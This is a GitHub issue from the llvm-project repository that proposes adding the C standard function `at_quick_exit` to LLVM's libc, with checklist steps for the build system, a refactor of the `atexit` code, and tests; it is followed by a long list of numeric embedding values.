This is a GitHub Issue repo:llvm-project owner:llvm Title : [libc] add `at_quick_exit` Issue date: --- start body --- Followup to #93581 The `at_quick_exit` function is defined in the C standard on page 381 of this PDF: https://www.open-std.org/jtc1/sc22/wg14/www/docs/n3220.pdf It's used to register callbacks to be run when `quick_exit` is called, so changes to `quick_exit` will be necessary. Additionally it's similar in design to [`atexit`](https://github.com/llvm/llvm-project/blob/main/libc/src/stdlib/atexit.cpp) so refactoring to reuse that code is recommended. ### Build System In [entrypoints.txt](https://github.com/llvm/llvm-project/blob/main/libc/config/linux/x86_64/entrypoints.txt) - [ ] Add the new function to the list of entrypoints for stdlib.h (you need to do this before it will build) In [stdlib/CMakeLists.txt](https://github.com/llvm/llvm-project/blob/main/libc/src/stdlib/CMakeLists.txt) - [ ] Add new entrypoint objects to the list In [stdc.td](https://github.com/llvm/llvm-project/blob/main/libc/spec/stdc.td) - [ ] Add the functions to the list of functions for stdlib.h. ### Code - [ ] Refactor [`atexit`](https://github.com/llvm/llvm-project/blob/main/libc/src/stdlib/atexit.cpp) The existing implementation of `atexit` defines a system for storing and calling functions similar to what should be used for `at_quick_exit`, so it should be moved to a shared file. From there, both `atexit` and `at_quick_exit` should maintain separate lists of functions to call. - [ ] Create `stdlib/at_quick_exit.h` - [ ] Create `stdlib/at_quick_exit.cpp` ### Testing - [ ] Create `test/src/stdlib/at_quick_exit_test.cpp` - [ ] Add your test to [test/src/stdlib/CMakeLists.txt](https://github.com/llvm/llvm-project/blob/main/libc/test/src/stdlib/CMakeLists.txt) --- end body ---
1,836
[ -0.03350965678691864, 0.00919403601437807, -0.011474945582449436, 0.01950036734342575, 0.003014812944456935, -0.02172495797276497, -0.029398387297987938, 0.05381256341934204, -0.023062527179718018, 0.027384992688894272, -0.0275680273771286, 0.006156343035399914, 0.041563235223293304, 0.010355610400438309, -0.027680665254592896, -0.005652994383126497, -0.019246932119131088, 0.01431904174387455, -0.0009882180020213127, -0.028398729860782623, 0.012425323948264122, 0.025568712502717972, -0.020190272480249405, 0.030637400224804878, 0.011693180538713932, 0.0060225860215723515, -0.007191200274974108, -0.03165113553404808, -0.024132583290338516, 0.028539525344967842, 0.033763088285923004, 0.023062527179718018, 0.01702234148979187, -0.011833976954221725, -0.0003634319291450083, -0.009982498362660408, 0.025019604712724686, 0.052151162177324295, -0.034776829183101654, -0.01440352015197277, -0.0021436323877424, 0.0037768760230392218, -0.005403080023825169, -0.010489366948604584, -0.038409385830163956, 0.04632217064499855, 0.046660084277391434, 0.0001402468915330246, -0.057473283261060715, 0.03196088969707489, 0.05018000677227974, -0.03776172176003456, 0.012671718373894691, -0.023682033643126488, 0.020767537876963615, -0.01698010228574276, 0.05271434783935547, 0.00453365920111537, 0.016233880072832108, -0.0008399413200095296, -0.032918307930231094, 0.045956097543239594, 0.033002786338329315, -0.003104571020230651, 0.01803607866168022, -0.013974089175462723, -0.021358884871006012, -0.012312686070799828, 0.009137717075645924, -0.0166703499853611, -0.029370227828621864, 0.011228550225496292, -0.009912099689245224, 0.01063720416277647, -0.019401809200644493, -0.00689200684428215, 0.03728301078081131, 0.04246433824300766, 0.0018673185259103775, 0.0189653392881155, -0.03072187677025795, 0.004808213096112013, -0.02247118018567562, 0.042492497712373734, 0.01958484575152397, 0.00939819123595953, 0.009538988582789898, -0.055699244141578674, -0.015121583826839924, 0.029313908889889717, -0.0031960890628397465, -0.007321437355130911, 0.026737326756119728, 0.015543974936008453, -0.011193351820111275, 0.005628354847431183, -0.045364752411842346, 0.0048539722338318825, -0.018373992294073105, -0.026399413123726845, -0.014255682937800884, 0.011981814168393612, 0.000183585929335095, 0.015881886705756187, -0.013347543776035309, 0.0055825961753726006, 0.0048011732287704945, 0.0036642386112362146, 0.023372281342744827, 0.07039843499660492, -0.0060929846949875355, 0.004741334822028875, -0.018740063533186913, -0.017881203442811966, 0.017585529014468193, 0.0009926179191097617, 0.00482229283079505, -0.028257932513952255, -0.0063323392532765865, -0.015980444848537445, -0.03401652351021767, -0.018317673355340958, -0.0025290637277066708, -0.03367861360311508, -0.008933561854064465, -0.0025237840600311756, 0.04491420090198517, -0.008342214860022068, 0.011066634207963943, 0.005719873122870922, -0.05034896358847618, -0.04668824374675751, -0.018416231498122215, -0.02455497533082962, 0.017655927687883377, -0.031144268810749054, -0.03196088969707489, 0.03027132712304592, -0.017120899632573128, -0.0349457822740078, -0.042971204966306686, -0.016825227066874504, 0.038409385830163956, 0.02327372319996357, -0.017613688483834267, -0.05063055455684662, -0.015107504092156887, 0.00003965411815443076, 0.008081740699708462, 0.010566805489361286, 0.012122610583901405, 0.03618479520082474, 0.025301197543740273, 0.0031274505890905857, 0.01555805467069149, 0.013044830411672592, -0.014234564267098904, 0.019261011853814125, -0.023344121873378754, 0.005142605863511562, -0.04201378673315048, -0.004653336480259895, -0.007525593042373657, -0.017134979367256165, -0.007293277885764837, -0.017529210075736046, 0.012509802356362343, -0.0002239550231024623, 0.007448154501616955, 0.019964996725320816, -0.01219300925731659, 0.011137032881379128, 0.01857110671699047, -0.011221510358154774, 0.0021119529847055674, -0.005515717435628176, 0.001766120782122016, 0.006268980912864208, 0.011918455362319946, -0.03421363979578018, -0.017388414591550827, 0.02925758995115757, -0.049673136323690414, 0.003486482659354806, 0.022189587354660034, -0.020331067964434624, 0.01509342435747385, -0.030778195708990097, 0.04268961027264595, -0.0133827431127429, -0.02822977304458618, 0.023822830989956856, -0.006613933015614748, 0.008039501495659351, 0.028074895963072777, -0.0126365190371871, -0.027807382866740227, -0.006416817661374807, -0.005139085929840803, 0.011974774301052094, 0.02057042345404625, -0.009236275218427181, -0.05598083510994911, 0.0211054515093565, -0.031989049166440964, 0.007018723990768194, 0.017881203442811966, -0.02026066929101944, -0.008116940036416054, -0.013882571831345558, 0.011418626643717289, -0.0037733560893684626, 0.014086727052927017, -0.027722904458642006, 0.003549841232597828, 0.014727353118360043, 0.0006705450941808522, 0.013840332627296448, -0.01128486916422844, -0.034551553428173065, 0.009651625528931618, 0.014312001876533031, 0.00784238614141941, -0.026230458170175552, -0.018585186451673508, 0.0077156685292720795, 0.024794328957796097, -0.012798435986042023, -0.012995551340281963, 0.015698852017521858, 0.029736299067735672, -0.02300620824098587, -0.046744562685489655, 0.025202639400959015, 0.06600557267665863, 0.009313712827861309, 0.009637545794248581, -0.004213346634060144, 0.03604399785399437, -0.0024586652871221304, 0.007398875895887613, 0.01764184795320034, -0.048743877559900284, -0.024526815861463547, -0.0046744560822844505, 0.04181667044758797, -0.027891861274838448, 0.05550212785601616, -0.02859584428369999, 0.0055825961753726006, -0.01662811078131199, -0.01354465913027525, 0.024315619841217995, -0.01046120747923851, 0.015966365113854408, 0.015008946880698204, 0.01310114935040474, 0.018120557069778442, -0.01830359362065792, -0.024259300902485847, 0.00655057467520237, 0.0056565143167972565, 0.0003117330779787153, 0.0614437535405159, -0.023301882669329643, 0.0005913468776270747, 0.029595503583550453, 0.02133072540163994, 0.0012381324777379632, -0.017346175387501717, 0.06099320575594902, -0.034157320857048035, -0.014473918825387955, -0.01276323664933443, 0.00935595203191042, 0.007075042929500341, -0.01190437562763691, 0.025610951706767082, -0.0375082865357399, -0.03148218244314194, -0.0010841359617188573, 0.015107504092156887, -0.013664336875081062, -0.004811733029782772, -0.0052904426120221615, -0.021246248856186867, -0.023203324526548386, -0.005026448518037796, -0.03401652351021767, -0.0059486678801476955, -0.004526619333773851, 0.0056001958437263966, -0.012376044876873493, 0.041563235223293304, 0.035171058028936386, 0.022457100450992584, -0.04398494213819504, 0.007085602730512619, -0.05772671848535538, -0.03404468297958374, 0.01358689833432436, -0.00025387437199242413, -0.007976142689585686, 0.0007990222657099366, -0.0800289437174797, -0.020035395398736, -0.0009653385495766997, 0.0009706184500828385, -0.007490393705666065, -0.007905744016170502, 0.032552238553762436, -0.03657902777194977, -0.0016050843987613916, -0.01152422372251749, 0.01657179184257984, 0.0017678807489573956, -0.02216142788529396, -0.015628453344106674, -0.0003629919374361634, -0.005635394714772701, -0.014994867146015167, 0.0004252505605109036, -0.019303251057863235, 0.017585529014468193, 0.03677614405751228, -0.0301868487149477, -0.009327792562544346, -0.03410100191831589, -0.00824365671724081, -0.004262625239789486, 0.02801857702434063, -0.01586780697107315, -0.03142586350440979, -0.010404888540506363, -0.00993321929126978, -0.040267907083034515, -0.05744512379169464, 0.07456602156162262, 0.009461550042033195, 0.0001913957530632615, -0.014044487848877907, 0.0076593500562012196, -0.01132710836827755, -0.009095477871596813, 0.01574109122157097, -0.02100689336657524, -0.019049817696213722, 0.007236959412693977, -0.01776856556534767, 0.014107846654951572, 0.0007409435347653925, 0.021401124075055122, 0.051137425005435944, -0.0005649474333040416, 0.0021559521555900574, -0.006701931357383728, -0.020894255489110947, -0.004135908093303442, 0.05648770555853844, -0.018894940614700317, 0.037170372903347015, -0.032693032175302505, 0.0104189682751894, 0.020148033276200294, -0.061725348234176636, 0.04401310160756111, -0.015839647501707077, 0.0005948668112978339, -0.0033861647825688124, -0.01838807202875614, -0.025864385068416595, 0.06713195145130157, 0.0026733805425465107, 0.04663192480802536, -0.03159481659531593, -0.0031520898919552565, -0.007814226672053337, -0.004945490043610334, -0.03576240688562393, 0.023034367710351944, 0.046125054359436035, 0.03289014846086502, 0.02123216912150383, -0.031454022973775864, 0.005040528252720833, -0.030130531638860703, -0.005114446394145489, 0.06290804594755173, -0.011010315269231796, -0.054769985377788544, -0.020823856815695763, 0.05302410200238228, -0.023386361077427864, -0.03990183398127556, 0.0029303350020200014, 0.037254851311445236, -0.008257736451923847, 0.0032383280340582132, -0.006268980912864208, -0.021443363279104233, 0.0016719629056751728, -0.03990183398127556, 0.03728301078081131, 0.03260855749249458, -0.003041212446987629, 0.009679784998297691, -0.019570766016840935, -0.028609924018383026, 0.02256973832845688, 0.008412613533437252, -0.0104189682751894, -0.04229538142681122, -0.055783722549676895, 0.03218616545200348, 0.025371596217155457, 0.028356490656733513, -0.004301344510167837, 0.004410461988300085, -0.03252407908439636, 0.007919823750853539, -0.012256368063390255, -0.01937364973127842, -0.019472207874059677, 0.03058108128607273, 0.05767039954662323, 0.0156002938747406, 0.015107504092156887, -0.010785040445625782, 0.006969445385038853, -0.05341833457350731, -0.017050500959157944, -0.0069483257830142975, 0.013087069615721703, 0.007532632909715176, 0.0018954778788611293, -0.030975311994552612, -0.028173454105854034, -0.011439746245741844, 0.014304962009191513, 0.0011694940039888024, -0.010292251594364643, 0.0478709377348423, 0.0010867759119719267, -0.004998289048671722, -0.02490696683526039, -0.017613688483834267, 0.005301002413034439, 0.025653190910816193, 0.015459496527910233, 0.01059496495872736, -0.008299975655972958, 0.0504334382712841, 0.016079002991318703, 0.02779330313205719, 0.044576290994882584, -0.02261197753250599, -0.014459839090704918, -0.005575556308031082, 0.01305187027901411, -0.03488946333527565, 0.0634712278842926, 0.01325602550059557, -0.0022809093352407217, 0.007015204057097435, -0.01600860431790352, 0.0010709362104535103, -0.005568516440689564, -0.04184482991695404, -0.0000832131554489024, 0.0031520898919552565, -0.007877585478127003, 0.01509342435747385, 0.006557614542543888, -0.00525172334164381, 0.004952529910951853, -0.008602689020335674, -0.00486453203484416, -0.012024053372442722, -0.008975801058113575, -0.02739907056093216, -0.01866966485977173, -0.0213166456669569, -0.026089660823345184, 0.011798777617514133, 0.02114769071340561, 0.009327792562544346, -0.005019408650696278, 0.029088633134961128, 0.006114104297012091, 0.02855360507965088, 0.009602346457540989, -0.025019604712724686, 0.0036923980806022882, -0.03412916138768196, 0.01799383945763111, 0.002419946249574423, -0.011291909031569958, -0.019613005220890045, 0.02651205100119114, -0.008827963843941689, 0.00862380862236023, -0.010806160047650337, 0.015417257323861122, -0.006205622106790543, 0.005631874781101942, -0.03179193288087845, -0.005557956639677286, -0.010700562037527561, -0.009384111501276493, -0.00804654136300087, -0.006673771888017654, -0.050686873495578766, -0.014727353118360043, -0.03556529060006142, -0.0033844048157334328, -0.05935996025800705, -0.02220366708934307, -0.004171107430011034, 0.03967655822634697, 0.014086727052927017, -0.008483011275529861, -0.009257394820451736, 0.014586555771529675, 0.03781804069876671, 0.0035304815974086523, 0.010440087877213955, -0.01502302661538124, -0.009869860485196114, 0.02490696683526039, -0.009003959596157074, 0.008609728887677193, -0.01883862167596817, -0.013910731300711632, 0.008032461628317833, 0.011242629960179329, -0.008384454064071178, 0.03218616545200348, 0.007405915297567844, 0.0009072598768398166, -0.016853386536240578, -0.013600978069007397, 0.03159481659531593, -0.011094793677330017, -0.02030290849506855, -0.0033949646167457104, 0.0013666095910593867, -0.04401310160756111, -0.0029039354994893074, -0.0007242239080369473, 0.022457100450992584, -0.02721603587269783, -0.01728985644876957, -0.008651968091726303, 0.020288828760385513, -0.0009538988233543932, -0.02304844744503498, -0.018993498757481575, 0.0008808604325167835, -0.004061989951878786, -0.013706575147807598, 0.009743143804371357, -0.005389000289142132, 0.027145637199282646, -0.021218089386820793, -0.019922757521271706, -0.02323148399591446, 0.006796969100832939, 0.02597702294588089, 0.003409044351428747, 0.0016790026566013694, 0.036015838384628296, -0.018768223002552986, 0.03962023928761482, -0.022949891164898872, -0.017937522381544113, 0.013776973821222782, -0.021260328590869904, -0.020767537876963615, -0.02048594504594803, -0.03103163093328476, 0.011981814168393612, -0.0231329258531332, -0.02455497533082962, 0.04429469630122185, 0.017670007422566414, -0.03032764606177807, -0.03426995873451233, -0.018683744594454765, -0.034636031836271286, -0.011911415494978428, -0.00022021510812919587, 0.009658665396273136, 0.006723050493746996, -0.002536103595048189, 0.0009336592629551888, -0.00044219018309377134, -0.01431904174387455, 0.0011430946178734303, 0.00895468145608902, -0.008637888357043266, 0.010397848673164845, 0.005346761085093021, 0.027652505785226822, -0.006026105955243111, -0.016994182020425797, 0.0014889269368723035, 0.00930667296051979, -0.047899097204208374, 0.002995453542098403, 0.0019605965353548527, -0.006846248172223568, -0.016923783347010612, 0.04713879153132439, 0.01181285735219717, -0.01502302661538124, 0.015670692548155785, 0.011066634207963943, -0.0009890979854390025, 0.02434377931058407, 0.005980347283184528, -0.0005205084453336895, -0.013030750676989555, -0.03945128247141838, 0.016825227066874504, 0.02682180516421795, 0.05198220536112785, -0.02694852091372013, -0.004519579466432333, 0.003914153203368187, -0.007377756293863058, 0.030609240755438805, 0.0029391348361968994, 0.003370325081050396, -0.009912099689245224, -0.011756539344787598, 0.03263671696186066, 0.014297922141849995, 0.0009697384666651487, -0.001833879272453487, 0.020556343719363213, -0.02558279223740101, -0.006258421111851931, -0.01902165822684765, 0.052770666778087616, -0.03545265272259712, -0.04330911859869957, 0.02016211301088333, 0.013903691433370113, 0.010911758057773113, 0.013094109483063221, -0.015051186084747314, -0.0051461257971823215, -0.022978048771619797, 0.03888809680938721, -0.010609044693410397, 0.0067864092998206615, 0.02517448179423809, 0.039028894156217575, -0.009722024202346802, -0.025554632768034935, -0.010369690135121346, 0.004104228690266609, -0.028539525344967842, -0.002050354378297925, 0.018120557069778442, -0.02123216912150383, 0.016276119276881218, -0.02721603587269783, 0.010369690135121346, 0.012847715057432652, -0.004758934490382671, -0.02659652940928936, -0.015037106350064278, 0.017501050606369972, -0.024034027010202408, -0.004632217343896627, 0.010390808805823326, 0.014910388737916946, -0.010813199914991856, 0.02256973832845688, 0.03852202370762825, -0.0017546809976920485, -0.030862674117088318, -0.04522395506501198, -0.0002628941729199141, 0.003050012281164527, 0.0085745295509696, -0.017712246626615524, -0.00039753117016516626, -0.03922601044178009, -0.007148961070924997, -0.01613532193005085, 0.012115570716559887, -0.0011184551985934377, 0.007307357620447874, 0.000189195794519037, 0.018106477335095406, 0.041337963193655014, 0.01902165822684765, 0.010904718190431595, -0.024752089753746986, 0.004421021789312363, -0.010144414380192757, 0.008145099505782127, 0.002902175532653928, 0.007057443261146545, -0.005258763208985329, -0.003446003422141075, -0.005797311197966337, 0.012354925274848938, -0.00866604782640934, -0.012946272268891335, -0.011207430623471737, 0.005617795046418905, 0.013319384306669235, 0.001022537238895893, 0.00032427278347313404, 0.0014141285791993141, -0.02779330313205719, 0.007015204057097435, -0.03545265272259712, -0.0034988021943718195, -0.03869098052382469, -0.01046120747923851, 0.0030165729112923145, -0.00828589592128992, -0.009419310837984085, -0.024174822494387627, -0.013938890770077705, 0.003159129759296775, -0.016557712107896805, -0.028567684814333916, 0.015107504092156887, -0.0074270348995924, -0.015121583826839924, -0.013171547092497349, 0.028356490656733513, 0.0042907847091555595, 0.018768223002552986, -0.029736299067735672, 0.012312686070799828, 0.0026205817703157663, -0.01170022040605545, 0.01181285735219717, -0.027286434546113014, -0.014671034179627895, 0.016768908128142357, 0.014396480284631252, -0.03336885944008827, 0.032693032175302505, 0.013171547092497349, 0.010468247346580029, -0.014642874710261822, -0.02434377931058407, -0.00008761305070947856, 0.0067160106264054775, 0.015332779847085476, -0.0229217316955328, 0.019261011853814125, 0.00870828703045845, -0.004385822452604771, 0.02172495797276497, 0.015065265819430351, 0.0011430946178734303, 0.010179613716900349, -0.020598582923412323, 0.020401466637849808, -0.028342410922050476, 0.01427680253982544, 0.007962062954902649, 0.018627425655722618, -0.013861452229321003, -0.036015838384628296, -0.02406218647956848, 0.022893572226166725, -0.017036421224474907, 0.0007435834850184619, -0.00039577120332978666, 0.00698000518605113, 0.023217404261231422, -0.022443020716309547, -0.0009494989062659442, -0.005997946951538324, -0.007229919545352459, 0.026610609143972397, -0.021696798503398895, 0.038944415748119354, 0.003319286275655031, 0.0027050599455833435, -0.019880518317222595, -0.004558298736810684, -0.030665559694170952, 0.07360860705375671, 0.011531263589859009, 0.04136612266302109, -0.03595952317118645, 0.013432021252810955, 0.0017538010142743587, -0.04285856708884239, -0.023682033643126488, 0.0457308255136013, 0.0030799314845353365, -0.014952627941966057, 0.0008395013283006847, 0.020176192745566368, 0.010397848673164845, -0.0043999021872878075, -0.0035885602701455355, -0.021865753456950188, 0.018740063533186913, -0.00877868477255106, 0.00992617942392826, 0.03272119164466858, 0.010672402568161488, 0.023062527179718018, 0.008229576982557774, 0.03472051024436951, 0.006856807507574558, 0.013319384306669235, 0.014044487848877907, -0.029679980129003525, 0.02521671913564205, 0.031172428280115128, -0.041028209030628204, -0.001630603801459074, 0.0007633830537088215, 0.019401809200644493, 0.0076593500562012196, 0.01387553196400404, 0.013108189217746258, 0.01203109323978424, -0.010827279649674892, 0.0051109264604747295, -0.028736641630530357, -0.004723735153675079, 0.00824365671724081, 0.01995091699063778, -0.02828609198331833, -0.011094793677330017, 0.07985998690128326, 0.01174949947744608, -0.0047835735604166985, -0.00621618190780282, 0.0046568564139306545, -0.010672402568161488, -0.009876900352537632, -0.04266145080327988, -0.007976142689585686, -0.014107846654951572, 0.009391151368618011, 0.048828355967998505, -0.0021964311599731445, -0.004019750747829676, 0.016867466270923615, 0.011981814168393612, -0.003688878146931529, -0.05265802890062332, 0.02106321230530739, 0.01239012461155653, 0.005878269672393799, -0.008715326897799969, 0.029623661190271378, 0.004526619333773851, -0.0040514301508665085, 0.04198562726378441, 0.023386361077427864, -0.0038261550944298506, -0.026793645694851875, 0.007208799943327904, 0.0060401856899261475, -0.01568477228283882, 0.0003909313236363232, 0.06279540807008743, -0.0034108043182641268, -0.002419946249574423, 0.01778264530003071, 0.009285553358495235, 0.0025818627327680588, 0.04956049844622612, 0.011890295892953873, -0.027230115607380867, -0.010531606152653694, -0.04308384284377098, -0.020443705841898918, 0.021133610978722572, -0.014825910329818726, -0.002103153383359313, -0.003599120071157813, 0.004558298736810684, -0.03981735557317734, -0.02544199489057064, 0.010904718190431595, 0.007215839810669422, -0.013727694749832153, 0.019627084955573082, -0.005519237369298935, -0.048518601804971695, -0.007574871648102999, -0.021640479564666748, -0.01021481305360794, -0.002103153383359313, 0.0000619836209807545, 0.01431904174387455, -0.025808066129684448, 0.010609044693410397, 0.0028000979218631983, 0.027694744989275932, 0.028694402426481247, 0.005491077899932861, 0.013854412361979485, -0.0022597897332161665, 0.011503104120492935, 0.013072989881038666, -0.013375703245401382, -0.003076411783695221, 0.03759276494383812, -0.018190955743193626, -0.013467220589518547, 0.032918307930231094, 0.03973287716507912, 0.01986643858253956, 0.018331753090023994, -0.03581872582435608, -0.007828306406736374, -0.013692496344447136, -0.04207010567188263, -0.017036421224474907, -0.027004839852452278, -0.002923295134678483, 0.0021841113921254873, -0.027018919587135315, 0.010763920843601227, 0.02230222523212433, 0.004611097741872072, -0.01636059582233429, -0.02123216912150383, -0.0137840136885643, -0.019669322296977043, -0.03314358368515968, -0.012946272268891335, -0.010700562037527561, 0.010482327081263065, -0.003995111212134361, -0.006589293479919434, 0.003667758544906974, 0.011313028633594513, -0.011587582528591156, 0.004301344510167837, -0.013896651566028595, -0.007001124322414398, -0.012397164478898048, -0.03652270883321762, 0.0002587142516858876, -0.032242484390735626, 0.01644507423043251, 0.015389097854495049, -0.01693786308169365, -0.003176729427650571, -0.03080635517835617, 0.004780053626745939, 0.022316304966807365, 0.015529895201325417, 0.004030310548841953, -0.004259105306118727, 0.01287587359547615, 0.000032064286642707884, -0.026526130735874176, 0.004262625239789486, -0.009229235351085663, -0.005952187813818455, 0.018993498757481575, -0.0039458321407437325, 0.014502078294754028, 0.026357173919677734, -0.014825910329818726, 0.022372623905539513, 0.017120899632573128, -0.003931752871721983, -0.027272354811429977, -0.0077156685292720795, 0.017318015918135643, 0.008659007959067822, 0.024188902229070663, -0.005082766991108656, 0.018697824329137802, -0.012516842223703861, -0.02114769071340561, 0.022316304966807365, -0.019317330792546272, 0.02925758995115757, 0.016121242195367813, -0.013791053555905819, 0.020683061331510544, -0.014994867146015167, -0.0027103398460894823, -0.012911072932183743, 0.030665559694170952, -0.0006309460150077939, -0.04561818763613701, -0.04401310160756111, -0.01099623553454876, 0.004491420462727547, -0.004956049844622612, -0.005244683474302292, -0.039958152920007706, 0.0034706429578363895, 0.00698000518605113, 0.01776856556534767, -0.030524762347340584, -0.00693776598200202, -0.013579858466982841, 0.004980689380317926, 0.026385333389043808, 0.018993498757481575, 0.03874729946255684, -0.010426008142530918, 0.015698852017521858, 0.0013446101220324636, 0.027511708438396454, 0.005079247057437897, -0.018894940614700317, 0.0020345149096101522, -0.011679100804030895, -0.003562161000445485, -0.011066634207963943, 0.018205035477876663, -0.005628354847431183, 0.005195404402911663, -0.0018637985922396183, 0.0053080422803759575, -0.021654559299349785, 0.0015390857588499784, 0.00443158159032464, -0.007779027335345745, -0.031087949872016907, -0.025822145864367485, 0.008363334462046623, -0.022907651960849762, 0.0010128575377166271, 0.03759276494383812, 0.028975997120141983, -0.002483304822817445, -0.03196088969707489, -0.005628354847431183, 0.009433390572667122, -0.015191982500255108, 0.015206062234938145, -0.019401809200644493, -0.00674769002944231, -0.02092241495847702, 0.011108873412013054, -0.00007809826638549566, 0.032383281737565994, -0.014431679621338844, 0.019218772649765015, 0.0006296260398812592, -0.005068687256425619, -0.017360255122184753, 0.015065265819430351, -0.007736788131296635, 0.009186996147036552, 0.0037451968528330326, -0.008194377645850182, -0.015177902765572071, -0.005322122015058994, -0.00849005114287138, 0.024400098249316216, 0.018557026982307434, 0.0017133218934759498, 0.022541578859090805, 0.02335820160806179, 0.012516842223703861, 0.01088359858840704, -0.042717769742012024, 0.01551581546664238, -0.024991445243358612, -0.03711405396461487, 0.003599120071157813, 0.016867466270923615, 0.002419946249574423, 0.009546027518808842, 0.0096445856615901, 0.010010657832026482, 0.013579858466982841, -0.02344268001616001, 0.012171889655292034, 0.008687167428433895, -0.02517448179423809, -0.01995091699063778, -0.014192325063049793, -0.020007235929369926, 0.0030376925133168697, 0.018120557069778442, -0.018993498757481575, -0.013769933953881264, -0.009088438004255295, 0.017529210075736046, 0.08475971966981888, -0.004931410308927298, 0.0009732584003359079, -0.02876480109989643, 0.014199364930391312, -0.01875414326786995, 0.017965681850910187, -0.02428746037185192, 0.02886335924267769, -0.017134979367256165, 0.010904718190431595, -0.0006437057163566351, -0.0024164263159036636, 0.005744512192904949, 0.000010924132766376715, 0.011165192350745201, 0.003671278478577733, -0.011094793677330017, 0.005198924336582422, 0.009334832429885864, -0.005952187813818455, 0.0033844048157334328, 0.0333406999707222, 0.018866781145334244, 0.0044527011923491955, -0.018120557069778442, -0.015839647501707077, -0.026343094184994698, -0.0055825961753726006, -0.01865558512508869, 0.018641505390405655, -0.013446100987493992, 0.00296377413906157, -0.02797633782029152, -0.013354583643376827, -0.002522024093195796, 0.062119580805301666, -0.017670007422566414, -0.0208379365503788, -0.021443363279104233, 0.004544219002127647, -0.018162796273827553, -0.012974431738257408, -0.01586780697107315, -0.03897257521748543, 0.00272089964710176, 0.03221432492136955, 0.031454022973775864, 0.0003297726798336953, -0.012988511472940445, 0.01720537804067135, -0.017501050606369972, 0.019162453711032867, -0.0002536543761380017, -0.014699193648993969, 0.00844781193882227, -0.007814226672053337, -0.018951259553432465, 0.006455536466091871, 0.01055272575467825, -0.0023900268133729696, 0.01595228537917137, -0.005293962545692921, 0.006311219651252031, -0.01427680253982544, 0.011207430623471737, -0.029004156589508057, -0.015375018119812012, -0.004421021789312363, 0.0032189683988690376, 0.013678416609764099, -0.004167587496340275, 0.023372281342744827, -0.0028282571583986282, -0.009778343141078949, -0.012164849787950516, 0.002053874311968684, 0.016276119276881218, -0.003342165844514966, 0.008813884109258652, 0.046660084277391434, 0.008166218176484108, 0.007490393705666065, -0.000558347615879029, 0.002778978319838643, 0.042041946202516556, -0.029820777475833893, 0.004266145173460245, -0.0208379365503788, 0.0008689807145856321, 0.007891664281487465, -0.011376387439668179, 0.0024252261500805616, 0.033847566694021225, 0.014910388737916946, -0.0008725006482563913, 0.013150427490472794, -0.007610070984810591, -0.012798435986042023, 0.0002890735922846943, -0.010109215043485165, -0.00959530659019947, 0.016430994495749474, -0.04322464019060135, 0.013995208777487278, -0.027469469234347343, 0.016388755291700363, 0.005184845067560673, 0.005853630136698484, 0.006652652285993099, -0.005054607521742582, -0.010735761374235153, -0.0060929846949875355, -0.022259986028075218, 0.010848399251699448, -0.007004644256085157, 0.01030633132904768, 0.020063554868102074, -0.006842728238552809, -0.040802933275699615, -0.02335820160806179, 0.006138743832707405, 0.00800430215895176, 0.01349538005888462, 0.004009190946817398, 0.022316304966807365, -0.012249328196048737, 0.007701588794589043, 0.0092433150857687, 0.016459153965115547, 0.042886726558208466, -0.01617756113409996, 0.019401809200644493, -0.022414861246943474, 0.00953194871544838, 0.012136690318584442, 0.038099635392427444, 0.034326277673244476, -0.01568477228283882, 0.009144756942987442, -0.014312001876533031, 0.02535751648247242, -0.005892348941415548, 0.014685113914310932, 0.00016730627976357937, -0.002330188173800707, -0.008081740699708462, 0.005934588145464659, -0.007990222424268723, 0.029820777475833893, 0.028975997120141983, -0.021654559299349785, 0.023372281342744827, 0.03319990262389183, -0.005733952857553959, 0.02309068664908409, 0.012904033064842224, -0.04418205842375755, 0.006737130228430033, 0.004523099400103092, -0.007884625345468521, 0.014100806787610054, 0.05372808501124382, 0.011960694566369057, 0.00568467378616333, -0.011003275401890278, 0.011608702130615711, -0.01478367205709219, -0.03182009235024452, -0.011777658015489578, 0.033537816256284714, -0.0040690298192203045, -0.010341530665755272, -0.0011325348168611526, 0.020767537876963615, 0.02451273612678051, 0.001040136907249689, 0.01203109323978424, 0.02118992991745472, -0.016811147332191467, -0.010538646019995213, -0.007163040805608034, -0.02558279223740101, 0.00260474206879735, 0.002449865685775876, -0.02979261800646782, 0.008722365833818913, -0.002036274876445532, -0.02642757259309292, 0.03134138509631157, 0.01652955263853073, 0.029285749420523643, -0.003586800303310156, -0.01509342435747385, -0.004311904311180115, -0.008968761190772057, 0.01493854820728302, -0.015994524583220482, -0.017670007422566414, -0.021781276911497116, 0.004192227032035589, -0.009003959596157074, -0.0218516755849123, -0.02500552497804165, 0.009348912164568901, -0.031932730227708817, -0.04184482991695404, -0.02552647329866886, 0.015459496527910233, -0.009102517738938332, -0.0001306771009694785, 0.008222537115216255, 0.019753800705075264, -0.008102860301733017, 0.02230222523212433, -0.003653678810223937, -0.019204692915081978, -0.02149968221783638, 0.011939574964344501, -0.005008848849684, -0.0007537032361142337, -0.011031434871256351, 0.00044901002547703683, 0.009736103937029839, 0.010045857168734074, 0.031538501381874084, -0.009461550042033195, 0.0030306526459753513, -0.00356920063495636, 0.0359032042324543, -0.008264776319265366, -0.006096504628658295, -0.018683744594454765, -0.006515375338494778, -0.003215448698028922, -0.010862478986382484, 0.034917622804641724, -0.02362571470439434, 0.009560107253491879, 0.020852016285061836, 0.0077156685292720795, -0.015220141969621181, -0.0031116108875721693, -0.01502302661538124, -0.00626194104552269, -0.00031283305725082755, -0.019049817696213722, 0.0021559521555900574, 0.004392862319946289, -0.000526668329257518, 0.00849005114287138, 0.02034514769911766, -0.014227524399757385, -0.022752774879336357, -0.016064923256635666, 0.012376044876873493, 0.030158689245581627, -0.0012046932242810726, 0.009750183671712875, -0.005857150070369244, -0.0009574187570251524, -0.026582449674606323, -0.024188902229070663, 0.03564976900815964, -0.011024395003914833, 0.020668981596827507, -0.020316988229751587, -0.01710681989789009, -0.0005103886360302567, -0.007581911515444517, 0.0033228062093257904, -0.001130774850025773, -0.008314055390655994, 0.004706135485321283, -0.029088633134961128, 0.013432021252810955, 0.02428746037185192, -0.02282317355275154, -0.0020925935823470354, 0.007099682465195656, 0.014297922141849995, 0.019429968670010567, -0.02030290849506855, -0.0047448547556996346, -0.0014607675839215517, -0.03550897166132927, -0.0192891713231802, -0.012256368063390255, -0.013467220589518547, 0.037705402821302414, 0.009165876545011997, 0.01234788540750742, 0.002441065851598978, 0.0022685895673930645, 0.00042063064756803215, 0.01416416559368372, -0.004114788491278887, 0.015107504092156887, 0.014185285195708275, -0.0008782204822637141, -0.03089083358645439, -0.01198885403573513, 0.017303936183452606, -0.0043259840458631516, 0.00026553409406915307, 